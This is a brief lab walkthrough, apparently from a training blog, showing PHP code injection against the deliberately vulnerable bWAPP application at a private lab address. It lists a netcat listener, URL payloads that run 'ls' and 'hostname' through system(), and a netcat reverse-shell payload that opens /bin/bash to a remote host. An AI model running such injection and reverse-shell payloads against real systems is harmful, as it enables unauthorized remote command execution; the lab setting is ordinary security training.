PHP Code Injection

Commands

Listen for a connection

nc -lvp 4444

list the files

http://192.168.20.131/bWAPP/phpi.php?message=system(‘ls‘)

view the hostname

http://192.168.20.131/bWAPP/phpi.php?message=system(‘hostname’)

Make a connection to the remote host

http://192.168.20.131/bWAPP/phpi.php?message=system(‘nc -vn 192.168.20.131 4444 -e /bin/bash’)

unrestricted file-upload high.jpg

Demonstration Of The Attack

If you have any questions please comment below.